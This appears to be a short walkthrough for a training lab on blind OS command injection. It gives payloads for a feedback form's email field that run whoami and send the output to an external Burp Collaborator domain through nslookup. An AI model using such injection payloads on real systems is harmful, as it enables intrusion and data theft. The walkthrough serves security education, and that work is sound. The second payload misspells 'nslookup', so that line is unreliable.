This lab contains a blind OS command injection vulnerability in the feedback function.
⚙️ The command runs asynchronously and produces no output in the response.
🚫 You cannot redirect the output to a file or readable location.
✅ But you can exfiltrate command output using DNS queries to an external domain (Burp Collaborator).
Execute the whoami command on the server and exfiltrate its output via a DNS request to Burp Collaborator.
You’ll need to capture the username from the DNS query to complete the lab
You want the server to execute the whoami command, then send its output as a subdomain in a DNS request.
🧬 Use one of the following payloads in the email field
$email = || nslookup `whoami` BurpCollaborator ||
or use this command
$email = || nslookuop $(whoami) BurpCollaborator ||
✅ The backticks (``) and $(...) both execute shell commands and pass the output to nslookup
